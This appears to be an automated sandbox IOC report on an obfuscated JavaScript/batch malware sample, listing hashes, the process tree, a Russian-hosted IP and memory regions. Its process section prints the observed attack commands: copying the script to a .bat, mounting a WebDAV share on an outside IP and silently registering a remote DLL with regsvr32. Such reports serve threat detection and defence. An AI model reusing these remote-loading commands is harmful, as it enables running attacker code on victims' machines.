Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

911966882735824909.js

ASCII text, with very long lines (3738), with CRLF line terminators

initial sample

Details

Filetype:	ASCII text, with very long lines (3738), with CRLF line terminators
Entropy:	4.743004411065365
Filename:	911966882735824909.js
Filesize:	5910
MD5:	8c191d66f4255e637dad88e4af68b8a4
SHA1:	511998d50a6780c570dd0c920ba1dfeae2d27a43
SHA256:	7d84dcf2dd227761c0eb67814538c2d2eb6de133e7ad1977e6756f76742c9084
SHA512:	489d53109e1ad5ac237fe3652488bdba9971c0ef66d7cd25a99e2bf777cbcc74d9b29ac6928ecf6ffcf752b367a7d103157584562cf1714d8d9a97efea65306b
SSDEEP:	96:bbzgmh/bLVpmMtPlmZDBlEuRRlaMaIYNQlGVTdvaeg8D95okqwUOLacKVaD9vBax:bgmLsDGnAF9iXkmkz
Preview:	/* apjasa..set apjasavjxahy=H..set apjasajniuyr=p..set apjasajcspao=c..set apjasaxxzgur=h..set apjasakshqyq=C..set apjasainkctl=M..set apjasaaeujqf=9..set apjasaujncqu=W..set apjasahtbcgp=w..set apjasacqvldm=0..set apjasafcsowl=o..set apjasaanpgeg=j..set

Signature Hits	Behavior Group	Mitre Attack
Multi AV Scanner detection for submitted file	AV Detection
Java / VBScript file with very long strings (likely obfuscated code)	System Summary	Scripting Obfuscated Files or Information
Sample is known by Antivirus	System Summary

C:\Users\user\qtgsne.bat

ASCII text, with very long lines (3738), with CRLF line terminators

dropped

Details

File:	C:\Users\user\qtgsne.bat
Category:	dropped
Dump:	qtgsne.bat.1.dr
ID:	dr_1
Target ID:	1
Process:	C:\Windows\System32\cmd.exe
Type:	ASCII text, with very long lines (3738), with CRLF line terminators
Entropy:	4.743004411065365
Encrypted:	false
Ssdeep:	96:bbzgmh/bLVpmMtPlmZDBlEuRRlaMaIYNQlGVTdvaeg8D95okqwUOLacKVaD9vBax:bgmLsDGnAF9iXkmkz
Size:	5910
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Creates files inside the user directory	System Summary	Masquerading

C:\Users\user\qtgsne.bat:Zone.Identifier

ASCII text, with CRLF line terminators

modified

Details

File:	C:\Users\user\qtgsne.bat:Zone.Identifier
Category:	modified
Dump:	qtgsne.bat_Zone.Identifier.1.dr
ID:	dr_0
Target ID:	1
Process:	C:\Windows\System32\cmd.exe
Type:	ASCII text, with CRLF line terminators
Entropy:	3.95006375643621
Encrypted:	false
Ssdeep:	3:ggPYV:rPYV
Size:	26
Whitelisted:	false
Reputation:	high

Processes

Path

Cmdline

Malicious

C:\Windows\System32\wscript.exe

C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\911966882735824909.js"

Details

Is windows:	true
Is dropped:	false
PID:	7260
Target ID:	0
Parent PID:	2580
Name:	wscript.exe
Class:	wscript
Path:	C:\Windows\System32\wscript.exe
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\911966882735824909.js"
Size:	170496
MD5:	A47CBE969EA935BDD3AB568BB126BC80
Time:	00:32:04
Date:	05/07/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff6e3170000
Modulesize:	184320
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: WScript or CScript Dropper	System Summary
Sigma detected: Suspicious Copy From or To System Directory	System Summary
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat"

Details

Is windows:	true
Is dropped:	false
PID:	7308
Target ID:	1
Parent PID:	7260
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	"C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat"
Size:	289792
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
Time:	00:32:04
Date:	05/07/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff7f0120000
Modulesize:	421888
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32	System Summary
Sigma detected: Suspicious Copy From or To System Directory	System Summary
Executes batch files	System Summary	Scripting
Sigma detected: System Network Connections Discovery Via Net.EXE	System Summary
Sigma detected: Windows Share Mount Via Net.EXE	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\net.exe

net use \\45.9.74.13@8888\DavWWWRoot\

Details

Is windows:	true
Is dropped:	false
PID:	7360
Target ID:	3
Parent PID:	7308
Name:	net.exe
Path:	C:\Windows\System32\net.exe
Commandline:	net use \\45.9.74.13@8888\DavWWWRoot\
Size:	59904
MD5:	0BD94A338EEA5A4E1F2830AE326E6D19
Time:	00:32:04
Date:	05/07/2024
Reason:	newprocess
Reputation:	moderate
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff6969d0000
Modulesize:	122880
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Gathers information about network shares	Stealing of Sensitive Information	Network Share Discovery
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Communication To Uncommon Destination Ports	System Summary
Sigma detected: System Network Connections Discovery Via Net.EXE	System Summary
Sigma detected: Windows Share Mount Via Net.EXE	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	7316
Target ID:	2
Parent PID:	7308
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	00:32:04
Date:	05/07/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff7699e0000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Windows\System32\regsvr32.exe

regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\539.dll

Details

Is windows:	true
Is dropped:	false
PID:	7636
Target ID:	10
Parent PID:	7308
Name:	regsvr32.exe
Class:	system-tools
Path:	C:\Windows\System32\regsvr32.exe
Commandline:	regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\539.dll
Size:	25088
MD5:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Time:	00:32:10
Date:	05/07/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff79b0e0000
Modulesize:	45056
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Registers a DLL	Data Obfuscation	Regsvr32
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32	System Summary
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

http://45.9.74.13:8888/~

unknown

http://45.9.74.13:8888/

unknown

IPs

Domain

Country

Malicious

45.9.74.13

unknown

Russian Federation

Details

IP:	45.9.74.13
TargetID:	3
Current Path:	C:\Windows\System32\net.exe
Country:	Russian Federation
Countrycode:	RUS
ASN number:	200740
ASN name:	FIRST-SERVER-EU-ASRU
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Gathers information about network shares	Stealing of Sensitive Information	Network Share Discovery
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Registers a DLL	Data Obfuscation	Regsvr32
Sigma detected: Communication To Uncommon Destination Ports	System Summary
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32	System Summary
Connects to IPs without corresponding DNS lookups	Networking
Sigma detected: System Network Connections Discovery Via Net.EXE	System Summary
Sigma detected: Windows Share Mount Via Net.EXE	System Summary
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

Registry

Path

Value

Malicious

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe

JScriptSetScriptStateStarted

Memdumps

Base Address

Regiontype

Protect

Malicious

23C472DC000

heap

page read and write

23C470D0000

heap

page read and write

1410000

heap

page read and write

2A73BDA7000

heap

page read and write

2A73C030000

heap

page read and write

BCDC6FE000

stack

page read and write

BCDC4FF000

stack

page read and write

E62CF0A000

stack

page read and write

23C47120000

heap

page read and write

2A73BCF0000

heap

page read and write

2AAF000

stack

page read and write

23C4719D000

heap

page read and write

1414000

heap

page read and write

23C4718A000

heap

page read and write

23C47184000

heap

page read and write

2A73BDF5000

heap

page read and write

BCDC57E000

stack

page read and write

D6B000

stack

page read and write

23C47177000

heap

page read and write

2A73BD20000

heap

page read and write

2A73BDE1000

heap

page read and write

23C470B0000

heap

page read and write

2A73BD50000

heap

page read and write

2A73BD8E000

heap

page read and write

BCDC77F000

stack

page read and write

E62D3FE000

stack

page read and write

23C48F60000

heap

page read and write

23C472D5000

heap

page read and write

DB0000

heap

page read and write

E62D8FE000

stack

page read and write

23C47185000

heap

page read and write

23C472D0000

heap

page read and write

23C4716E000

heap

page read and write

23C472DB000

heap

page read and write

1170000

heap

page read and write

23C4719D000

heap

page read and write

2A73BD59000

heap

page read and write

2A73BF40000

remote allocation

page read and write

2A73BDEB000

heap

page read and write

E62DBFB000

stack

page read and write

23C4719D000

heap

page read and write

23C48C00000

heap

page read and write

2A73BD85000

heap

page read and write

2A73BD85000

heap

page read and write

23C47188000

heap

page read and write

2A73BD8B000

heap

page read and write

DC0000

heap

page read and write

2A73BD7A000

heap

page read and write

23C47148000

heap

page read and write

2A73C034000

heap

page read and write

2A73BF40000

remote allocation

page read and write

BCDC67C000

stack

page read and write

2A73BD00000

heap

page read and write

23C46FD0000

heap

page read and write

23C47163000

heap

page read and write

2A73BDB9000

heap

page read and write

23C472DA000

heap

page read and write

E62D9FD000

stack

page read and write

23C47177000

heap

page read and write

2A73BDD0000

heap

page read and write

23C48F50000

heap

page read and write

23C47161000

heap

page read and write

1194000

heap

page read and write

23C48F60000

heap

page read and write

E62D2FE000

stack

page read and write

23C48F51000

heap

page read and write

23C48F5A000

heap

page read and write

BCDC476000

stack

page read and write

23C47149000

heap

page read and write

2A73BF40000

remote allocation

page read and write

E62D5FF000

stack

page read and write

1187000

heap

page read and write

10D0000

heap

page read and write

2BD0000

heap

page read and write

E62D6FF000

stack

page read and write

117C000

heap

page read and write

23C48F5A000

heap

page read and write

E62D7FE000

stack

page read and write

BCDC5FE000

stack

page read and write

23C472DC000

heap

page read and write

23C4719D000

heap

page read and write

There are 71 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
911966882735824909.js

Files

Processes

URLs

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report911966882735824909.js

Files

Processes

URLs

IPs

Registry

Memdumps

IOC Report
911966882735824909.js